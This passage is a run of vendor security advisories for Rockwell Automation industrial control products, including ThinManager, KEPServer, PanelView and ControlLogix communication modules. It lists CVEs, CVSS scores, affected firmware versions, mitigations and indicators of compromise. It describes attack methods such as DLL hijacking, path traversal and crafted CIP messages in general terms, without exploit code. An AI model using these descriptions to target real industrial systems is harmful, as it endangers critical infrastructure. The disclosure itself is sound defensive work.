Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a use after free vulnerability in Animation within Google Chrome before 98.0.4758.102. This vulnerability could potentially allow a remote threat actor to exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 416 – Use After Free

Known Exploited Vulnerability (KEV) database: Yes

CVE-2020-16009 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains an inappropriate implementation in V8 of Google Chrome before 86.0.4240.18. This vulnerability allows a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write & 843 Access of Resource Using Incompatible Type (‘Type Confusion”)

Known Exploited Vulnerability (KEV) database: Yes

CVE-2020-16013 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains an inappropriate implementation in V8 of Google Chrome before 86.0.4240.198. This vulnerability allows a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: Yes

CVE-2020-15999
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a heap buffer overflow vulnerability in Freetype within Google Chrome before 86.0.4240.111. This vulnerability could allow a remote threat actor to potentially exploit heap corruption via a crafted HTML.

CVSS Base Score: 6.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: Yes

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Upgrade to version 21 or later.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

Critical

PN1647 | PN1647 | PanelView™ 800 Vulnerable to CVE-2017-12652

Published Date:

October 05, 2023

Last Updated:

October 05, 2023

CVE IDs:

CVE-2017-12652

Products:

PanelView 800, PanelView Component Refresh (PanelView 800)

CVSS Scores:

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Affected Products

Affected Product	First Known in firmware revision	Corrected in firmware revision
2711R-T10T	v3.011	v6.011
2711R-T7T
2711R-T4T

Vulnerability Details

An input/output validation vulnerability exists in a third-party component that the PanelView™ 800 utilizes. Libpng, which is PNG’s reference library, version 1.6.32 and earlier does not properly check the length of chunks against the user limit. Libpng versions prior to 1.6.32 are susceptible to a vulnerability which, when successfully exploited, could potentially lead to a disclosure of sensitive information, addition or modification of data, or a denial-of-service condition.
Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 9.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 – Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Update to v6.011 or later that mitigates the issue.
Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

JSON CVE- 2017-12652

Medium

PN1646 | PN1646 | KEPServer Enterprise Vulnerable to Multiple Vulnerabilities

Published Date:

October 05, 2023

Last Updated:

September 26, 2025

CVE IDs:

CVE 2023-29444, CVE 2023-29445, CVE 2023-29446, CVE 2023-29447

Products:

KEPServe Enterprise

CVSS Scores:

6.3, 6.3, 4.7, 5.7

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – September 12, 2023

Version 1.1 - September 26, 2025 - Corrected versions and CVE update

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
KEPServer Enterprise	v11.00	Update to version 14

Vulnerability Details

Rockwell Automation was notified by CISA of vulnerabilities discovered in Kepware® KEPServerEX (also known as PTC ThingWorx Industrial Connectivity), which affects Rockwell Automation’s KEPServer Enterprise product. Successful exploitation of these vulnerabilities could allow a threat actor to gain elevated privileges, execute arbitrary code, and obtain server hashes and credentials.

CVE 2023-29444 KEPServer Enterprise Uncontrolled Search Path Element
The installer application of KEPServerEX is vulnerable to DLL search order hijacking. This could allow an adversary to repackage the installer with a harmful DLL and trick users into installing the trojanized software. Successful exploitation could lead to code execution with administrator privileges. No known public uses specifically target this security issue. Creating a working exploit for this security issue would be difficult due to the code needing to be in a specific directory in the file system.

CVSS Base Score: 6.3 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-427: Uncontrolled Search Path Element

CVE 2023-29445 KEPServer Enterprise Uncontrolled Search Path Element
KEPServerEX binary is vulnerable to DLL search order hijacking. A locally authenticated adversary could escalate privileges to administrator by planting a malicious DLL in a specific directory. There are no known public uses specifically target this security issue. Creating a working exploit for this security issue would be difficult.

CVSS Base Score: 6.3 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-427: Uncontrolled Search Path Element

CVE 2023-29446 KEPServer Enterprise Improper Input Validation
KEPServerEx is vulnerable to UNC path injection via a malicious project file. By tricking a user into loading a project file and clicking a specific button in the GUI, an adversary could obtain Windows user NTLMv2 hashes, and crack them offline. No known public uses specifically target this security issue. There are no known public uses specifically target this security issue.

CVSS Base Score: 4.7 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-20: Improper Input Validation

CVE 2023-29447 KEPServer Enterprise Insufficiently Protected Credentials
The KEPServerEX Configuration web server uses basic authentication to protect user credentials. An adversary could perform a man-in-the-middle (MitM) attack via ARP spoofing to obtain the web server's plaintext credentials. There are no known public uses specifically target this security issue.

CVSS Base Score: 5.7 /10 (Medium)
CVSS 3.1 Vector String: AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-522: Insufficiently Protected Credentials

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected versions are encouraged to apply the risk mitigations below and implement our suggested security best practices to minimize risk of this vulnerability in their environments.

Users should follow the directions in PTC’s secure configuration documentation.
Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

Critical

PN1645 | PN1645 | FactoryTalk View Machine Edition Vulnerable to Remote Code Execution

Published Date:

October 05, 2023

Last Updated:

October 05, 2023

CVE IDs:

CVE-2023-2071

Products:

FactoryTalk View Machine Edition

CVSS Scores:

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – September 12, 2023

Affected Products

Affected Product	First Known in Revision	Corrected in Revision
FactoryTalk View Machine Edition	v12.0	v12.0 & v13.0 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. Rockwell Automation would like to thank Yuval Gordon, CPS Research, and the Microsoft Threat Intelligence Community for reporting this vulnerability to us.

CVE-2023-2071 IMPACT

FactoryTalk View Machine Edition on the PanelView Plus, improperly verifies user’s input, which allows unauthenticated attacker to achieve remote code executed via crafted malicious packets. The device has the functionality, through a CIP class, to execute exported functions from libraries. There is a routine that restricts it to execute specific functions from two dynamic link library files. By using a CIP class, an attacker can upload a self-made library to the device which allows the attacker to bypass the security check and execute any code written in the function.

CVSS Base Score: 9.8/10 (high)
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 – Improper Input Validation

Risk Mitigation & User Action

Customers using the affected versions are encouraged to upgrade to corrected firmware revisions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Install the security patches for the respective versions referencing BF29493 - Patch: FactoryTalk Linx CIP Vulnerability issue, FactoryTalk View ME 12.0, 13.0.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

High

PN1642 | PN1642 | Pavilion8® Security Misconfiguration Vulnerability

Published Date:

October 05, 2023

Last Updated:

October 05, 2023

CVE IDs:

CVE-2023-29463

Products:

ControlLogix Communications - Ethernet/IP

CVSS Scores:

8.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – September 12, 2023

Affected Products

Affected Product	First Known in Software Version	Corrected in Software Version
Pavilion8®	v5.17	v5.20

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-29463 IMPACT

The JMX Console within the Pavilion is exposed to application users and does not require authentication. If exploited, a malicious user could potentially retrieve other application users’ session data and or log users out of their session.

CVSS Base Score: 8.8/10
CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: 287- Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Update to v5.20
QA43240 - Recommended Security Guidelines from Rockwell Automation

If customers are unable to update to v5.20, please follow the instructions below to disable the vulnerability in v5.17.

Open the web.xml file in your Pavilion8® installation folder set during installation and go to Console\container\webapps\ROOT\WEB-INF, by default this would be under C:\Pavilion\Console\container\webapps\ROOT\WEB-INF.
Search for the text jmx-console-action-handler and delete the below lines from web.xml file:

<servlet>
<servlet-name>jmx-console-action-handler</servlet-name>
<servlet-class>com.pav.jboss.jmx.HtmlAdaptorServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>jmx-console-action-handler</servlet-name>
<url-pattern>/jmx-console/HtmlAdaptor</url-pattern>
</servlet-mapping>
Save the changes and close the file.
Restart Pavilion8® Console Service.
Logout and log back into the console and navigate to the URL http:// <FQDN>/jmx-console to confirm you are getting the error message HTTP Status 404 – Not Found.

Note: <FQDN> is your fully qualified domain name used for the Console login.

Additional Resources

CVE-2023-29463 JSON

High

PN1639 | PN1639 | Select Distributed I/O Communication Modules vulnerable to a Denial-of-Service Vulnerability

Published Date:

August 23, 2023

Last Updated:

August 23, 2023

CVE IDs:

CVE-2022-1737

Products:

1732E-OB16M12DR Series B, 1732E-IB16M12R Series B, 1734-AENTR , 1732E-OB16M12R Series B, 1732E-IB16M12DR Series B, 1732E-8X8M12DR Series B, 1738-AENTR Series A , 1732E-12X4M12P5QCDR Series A, 1732E-12X4M12QCDR Series A, 1732E-16CFGM12QCR Series A, 1734-AENT, 1732E-12X4M12QCDR Series A, 1732E-16CFGM12P5QCR Series A, 1732E-16CFGM12R Series B, 1799ER-IQ10XOQ10 Series B, 1732E-16CFGM12P5QCWR Series B, 1732E-16CFGM12QCWR Series A

CVSS Scores:

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – August 23, 2023

Affected Products

Affected Product	First Known in Firmware Version	Corrected in Firmware Version
1734-AENT/1734-AENTR Series C	<=7.011	7.013
1734-AENT/1734-AENTR Series B	<=5.019	5.021
1738-AENT/ 1738-AENTR Series B	<=6.011	6.013
1794-AENTR Series A	<=2.011	2.012
1732E-16CFGM12QCWR Series A	<=3.011	3.012
1732E-12X4M12QCDR Series A	<=3.011	3.012
1732E-16CFGM12QCR Series A	<=3.011	3.012
1732E-16CFGM12P5QCR Series A	<=3.011	3.012
1732E-12X4M12P5QCDR Series A	<=3.011	3.012
1732E-16CFGM12P5QCWR Series B	<=3.011	3.012
1732E-IB16M12R Series B	<=3.011	3.012
1732E-OB16M12R Series B	<=3.011	3.012
1732E-16CFGM12R Series B	<=3.011	3.012
1732E-IB16M12DR Series B	<=3.011	3.012
1732E-OB16M12DR Series B	<=3.011	3.012
1732E-8X8M12DR Series B	<=3.011	3.012
1799ER-IQ10XOQ10 Series B	<=3.011	3.012

Vulnerability Details

This issue was reported to Rockwell Automation by the Cybersecurity and Infrastructure Security Agency. The affected devices utilize the Pyramid Solutions EtherNet/IP Adapter kit and are could potentially be affected by the vulnerability.

CVE-2022-1737 IMPACT
Pyramid Solutions' affected products, the Developer and DLL kits for EtherNet/IP Adapter and EtherNet/IP Scanner may be vulnerable to an out-of-bounds write, which may allow an unauthorized threat actor to send a specially crafted packet that may result in a denial-of-service condition.

CVSS Base Score: 8.6
 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
 CWE: CWE-787 Out-of-Bounds Write

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible. Additionally, we encourage our customers to implement our suggested security best practices to minimize the risk of vulnerability.

Customers should upgrade to the corrected firmware to mitigate the issues.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

CVE-2022-1737 JSON

Critical

PN1638 | PN1638 | ThinManager® ThinServer™ Input Validation Vulnerabilities

Published Date:

August 17, 2023

Last Updated:

August 17, 2023

CVE IDs:

CVE-2023-2917, CVE-2023-2914, CVE-2023-2915

Products:

ThinManager ThinServer Input Validation Vulnerabilities

CVSS Scores:

7.5, 9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – August 17, 2023

Affected Products

Affected Product	Vulnerability	First Known in Software Versions	Corrected in Software Versions
ThinManager® ThinServer™	CVE-2023-2914 CVE-2023-2915 CVE-2023-2917	11.0.0-11.2.6 11.1.0-11.1.6 11.2.0-11.2.6 12.0.0-12.0.5 12.1.0-12.1.6 13.0.0-13.0.2 13.1.0	11.0.7 11.1.7 11.2.8 12.0.6 12.1.7 13.0.3 13.1.1

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. This vulnerability was discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2023-2914 IMPACT
Due to improper input validation, an integer overflow condition exists in the affected products. When the ThinManager processes incoming messages, a read access violation occurs and terminates the process. A malicious user could exploit this vulnerability by sending a crafted synchronization protocol message.

CVSS Base Score: 7.5/10
 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
 CWE: 20 Improper Input Validation

CVE-2023-2915 IMPACT
Due to improper input validation, a path traversal vulnerability exists when the ThinManager processes a certain function. If exploited, an unauthenticated remote threat actor can delete arbitrary files with system privileges. A malicious user could exploit this vulnerability by sending a specifically crafted synchronization protocol message.

CVSS Base Score: 7.5/10
 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
 CWE: 20 Improper Input Validation

CVE-2023-2917 IMPACT
Due to improper input validation, a path traversal vulnerability exists, via the file name field, when the ThinManager processes a certain function. If exploited, an unauthenticated remote attacker can upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. A malicious user could exploit this vulnerability by sending a crafted synchronization protocol message.

CVSS Base Score: 9.8/10
 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 CWE: 20 Improper Input Validation

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Update to the corrected software versions.
Limit remote access for TCP Port 2031 to known thin clients and ThinManager servers.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

High

PN1637 | PN1637 | Armor ™ PowerFlex ® Critical Fault Vulnerability

Published Date:

August 08, 2023

Last Updated:

August 08, 2023

CVE IDs:

CVE-2023-2423

Products:

Armor PowerFlex Critical Fault

CVSS Scores:

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – August 8, 2023

Affected Products

Affected Product	First Known in Firmware Revision	Corrected in Firmware Revision
Armor™ PowerFlex®	1.003	2.001 or later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2423 IMPACT
A vulnerability was discovered in Armor™ PowerFlex® when the product sends communications to the local event log. Threat actors could exploit this vulnerability by sending an influx of network commands, causing the product to generate an influx of event log traffic at a high rate. If exploited, the product would stop normal operations and self-reset. The error code would need to be cleared prior to resuming normal operations.

CVSS Base Score: 8.6
 CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
 CWE: CWE- 682 Incorrect Calculation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected versions are encouraged to apply the below risk mitigations and implement our suggested security best practices to minimize risk of this vulnerability in their environments.

Update to the latest version of Armor™ PowerFlex® (2.001 or later).
Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

JSON CVE-2023-2423

High

PN1634 | PN1634 | Kinetix® 5700 DC Bus Power Supply Series A – CIP Message Attack Could Cause Denial-Of-Service

Published Date:

July 18, 2023

Last Updated:

July 18, 2023

CVE IDs:

CVE-2023-2263

Products:

2198 Kinetix 5700 Drive

CVSS Scores:

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – July 18, 2023

Affected Products

Affected Product	First Known in Firmware Revision	Corrected in Firmware Revision
Kinetix® 5700 DC Bus Power Supply – Series A	V13.001	V13.003

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2263 IMPACT
The Kinetix 5700 DC Bus Power Supply Series A is vulnerable to CIP fuzzing. The new ENIP connections cannot be established if impacted by this vulnerability, which prohibits operational capabilities of the device resulting in a denial-of-service attack.

CVSS Base Score: 7.5
 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
 CWE: CWE-400: Uncontrolled Resource Consumption

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible.

Upgrade to V13.003 or later which has been patched to mitigate these issues.
For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
- System Security Design Guidelines Reference Manual publication, SECURE-RM001
- Configure System Security Features User Manual, SECURE-UM001
Additionally, we encourage the customer to implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

CVE-2023-2263 JSON

High

PN1635 | PN1635 | ThinManager® ThinServer™ Path Traversal Vulnerability

Published Date:

July 18, 2023

Last Updated:

July 18, 2023

CVE IDs:

CVE-2023-2913

Products:

ThinManager

CVSS Scores:

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – July 18, 2023

Affected Products

Affected Product	First Known in software version	Corrected in software version
ThinManager® ThinServer™	13.0.0 - 13.0.2 13.1.0	13.0.3 or later 13.1.1 or later

Vulnerability Details

A vulnerability was discovered by Security Researchers at Flashpoint.io and reported to Rockwell Automation. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2913 IMPACT
An executable used in the affected products can be configured to enable an API feature in the HTTPS Server Settings. This feature is disabled by default. When the API is enabled and handling requests, a path traversal vulnerability exists that allows a remote actor to leverage the privileges of the server’s file system and read arbitrary files stored in it. A malicious user could exploit this vulnerability by executing a path that contains manipulating variables.

CVSS Base Score: 7.5
 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 CWE-23 Relative Path Traversal

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of vulnerability.

Update to the corrected software versions.
Disable the API feature and use a service account with appropriate access for the application.
QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

High

PN1633 | PN1633 | Remote Code Execution and Denial-of-Service Vulnerabilities in Select Communication Modules

Published Date:

July 12, 2023

Last Updated:

July 12, 2023

CVE IDs:

CVE-2023-3596, CVE-2023-3595

Products:

Comms Modules

CVSS Scores:

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – July 12, 2023

Executive Summary

Rockwell Automation, in coordination with the U.S. government, has analyzed a novel exploit capability attributed to Advance Persistent Threat (APT) actors affecting select communication modules. We are not aware of current exploitation leveraging this capability, and intended victimization remains unclear. Previous threat actors cyberactivity involving industrial systems suggests a high likelihood that these capabilities were developed with an intent to target critical infrastructure and that victim scope could include international customers. Threat activity is subject to change and customers using affected products could face serious risk if exposed.

Rockwell Automation has provided patches for all affected products, including hardware series that were out of support. Detection rules have also been provided.

Exploitation of these vulnerabilities could allow malicious actors to gain remote access of the running memory of the module and perform malicious activity, such as manipulating the module’s firmware, inserting new functionality into the module, wiping the module’s memory, falsifying traffic to/from the module, establishing persistence on the module, and potentially affect the underlying industrial process. This could result in destructive actions where vulnerable modules are installed, including critical infrastructure.

Customers using the affected products are strongly encouraged to evaluate and implement the mitigations provided below. Additional details relating to the discovered vulnerabilities, including the products in scope, impact, and recommended countermeasures, are provided below.

Affected Products

Catalog	Series	Versions
1756-EN2T 1756-EN2TK 1756-EN2TXT	A,B,C	<=5.008 & 5.028
1756-EN2T 1756-EN2TK 1756-EN2TXT	D	<=11.003
1756-EN2TP 1756-EN2TPK 1756-EN2TPXT	A	<=11.003
1756-EN2TR 1756-EN2TRK 1756-EN2TRXT	A, B	<=5.008 & 5.028
1756-EN2TR 1756-EN2TRK 1756-EN2TRXT	C	<=11.003
1756-EN2F 1756-EN2FK	A, B	<=5.008 & 5.028
1756-EN2F 1756-EN2FK	C	<=11.003
1756-EN3TR 1756-EN3TRK	A	<=5.008 & 5.028
1756-EN3TR 1756-EN3TRK	B	<=11.003
1756-EN4TR 1756-EN4TRK 1756-EN4TRXT	A	<=5.001

Vulnerability Details

CVE-2023-3595
Where this vulnerability exists in the 1756 EN2* and 1756 EN3* products, it could allow a malicious user to perform remote code execution with persistence on the target system through maliciously crafted CIP messages. This includes the ability to modify, deny, and exfiltrate data passing through the device.

CVSS score: 9.8/10 (Critical)
 CVSS vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 CWE-787: Out-of-bounds Write

CVE-2023-3596
Where this vulnerability exists in the 1756-EN4* products, it could allow a malicious user to cause a denial of service by asserting the target system through maliciously crafted CIP messages.

CVSS Score: 7.5/10 (High)
 CVSS vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
 CWE-787: Out-of-bounds Write

Risk Mitigation & User Action

These vulnerabilities can be addressed by performing a standard firmware update. Customers are strongly encouraged to implement the risk mitigations provided below and to the extent possible, to combine these with the QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.

Catalog	Series	Affected Versions	Remediations
1756-EN2T 1756-EN2TK 1756-EN2TXT	A,B,C	<=5.008 & 5.028	Update to 5.029 or later for signed versions (**recommended). Update to 5.009 for unsigned versions.
1756-EN2T 1756-EN2TK 1756-EN2TXT	D	<=11.003	Update to 11.004 or later
1756-EN2TP 1756-EN2TPK 1756-EN2TPXT	A	<=11.003	Update to 11.004 or later
1756-EN2TR 1756-EN2TRK 1756-EN2TRXT	A, B	<=5.008 & 5.028	Update to 5.029 or later for signed versions (**recommended). Update to 5.009 for unsigned versions.
1756-EN2TR 1756-EN2TRK 1756-EN2TRXT	C	<=11.003	Update to 11.004 or later
1756-EN2F 1756-EN2FK	A, B	<=5.008 & 5.028	Update to 5.029 or later for signed versions (**recommended). Update to 5.009 for unsigned versions.
1756-EN2F 1756-EN2FK	C	<=11.003	Update to 11.004 or later
1756-EN3TR 1756-EN3TRK	A	<=5.008 & 5.028	Update to 5.029 or later for signed versions (**recommended). Update to 5.009 for unsigned versions.
1756-EN3TR 1756-EN3TRK	B	<=11.003	Update to 11.004 or later
1756-EN4TR 1756-EN4TRK 1756-EN4TRXT	A	<=5.001	Update to 5.002 or later

** Rockwell Automation strongly recommends updating to signed firmware if possible. Once the module is updated to signed firmware (example 5.008 to 5.029), it is not possible to revert to unsigned firmware versions.

Mitigations

Organizations should take the following actions to further secure ControlLogix communications modules from exploitation.

Update firmware. Update EN2* ControlLogix communications modules to firmware revision 11.004 and update EN4* ControlLogix communications modules to firmware revision 5.002.
Properly segment networks. Given a cyber actor would require network connectivity to the communication module to exploit the vulnerability, organizations should ensure ICS/SCADA networks are properly segmented within the process structure as well as from the Internet and other non-essential networks.
Implement detection signatures. Use appended Snort signatures to monitor and detect anomalous Common Industrial Protocol (CIP) packets to Rockwell Automation devices.

Additionally, organizations should increase protections of ICS/SCADA networks by implementing at least the following mitigations:

Regularly back up devices to allow for reversion to a clean copy of firmware or a working project;
disable unused CIP objects on communications modules, such as unused CIP Email and Socket Objects;
block all traffic to CIP-enabled devices from outside the ICS/SCADA network using available security products; and
monitor CIP traffic for unexpected content or unusual packets lengths.

Potential Indicators of Compromise

System owners should ensure ICS/SCADA networks are baselined and regularly monitored for deviations in network activity. Specifically, systems owners can look for the following potential IOCs (Indicators of Compromise) for ControlLogix communications modules:

Unknown scanning on a network for Common Industrial Protocol (CIP)-enabled devices.
Unexpected or out-of-specification CIP packets to CIP objects implemented in ControlLogix communications modules, including the Email Object and non-public vendor-specified objects.
Arbitrary writes to communication module memory or firmware.
Unexpected firmware updates.
Unexpected disabling of secure boot options.
Uncommon firmware file names.

Detection Rules

The following Snort rules are intended to be run on a computer with network visibility of a ControlLogix communications module and can be used to detect traffic to a ControlLogix communications module that does not conform to the CIP specification as provided by ODVA (Open DeviceNet Vendors Association). While both the CIP Email and Socket Objects are capable of communicating over a network, they are intended to communicate over the backplane of a ControlLogix PLC (Programmable Logic Controller) and therefore should not be seen over the network. However, it is possible that site engineers could configure a communications module such that there is legitimate network traffic to and from CIP Email and Socket Objects, potentially resulting in false positives.

Snort 2 Rules and Snort 3 Rules are both attached below.

References

Attachments

File

CVE-2023-3595 Snort 2.rules

Attachments

File

CVE-2023-3595 Snort 3.rules

Critical

PN1630 | PN1630 | Enhanced HIM Vulnerable to Cross Site Request Forgery Attack

Published Date:

July 11, 2023

Last Updated:

September 09, 2025

CVE IDs:

CVE-2023-2746

Products:

PowerFlex 7000, PowerFlex 6000

CVSS Scores:

9.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 - July 11, 2023

Version 1.1 - September 9, 2025

Affected Products

Affected Product	First Known in Firmware Revision	Corrected in Firmware Revision
Enhanced HIM	v1.001	v1.002

Security Issue Details

Rockwell Automation uses the latest version of the CVSS scoring system to assess thesecurity issues. The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency and to improvement of all business environments.

CVE-2023-2746 IMPACT
The API that the application uses is not protected sufficiently and uses incorrect Cross-Origin Resource Sharing (CORS) settings. As a result, it is vulnerable to a Cross Site Request Forgery (CSRF) attack. To use this, a threat actor would have to convince a user to click on an untrusted link. This is done through a social engineering attack or by performing a Cross Site Scripting Attack (XSS). Using a CSRF could lead to sensitive information disclosure and full remote access to the affected products.

CVSS Base Score: 9.6/10

 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

 CWE: CWE-352: Cross-Site Request Forgery (CSRF)

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Risk Mitigation & User Action

Customers using the affected software should use risk mitigation and our suggested security best practices to minimize the potential risks.

Upgrade to version 1.002 which mitigates this issue.
Security Best Practices: QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

CVE-2023-2746 JSON

Glossary

Application Programming Interface: (API) is a set of protocols and tools that allow different software applications to communicate with each other.

Cross-Origin Resource Sharing: (CORS) an HTTP-header-based mechanism that allows a server to specify which origins (domains, schemes, or ports) are permitted to access its resources

Cross Site Request Forgery: (CSRF) an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated

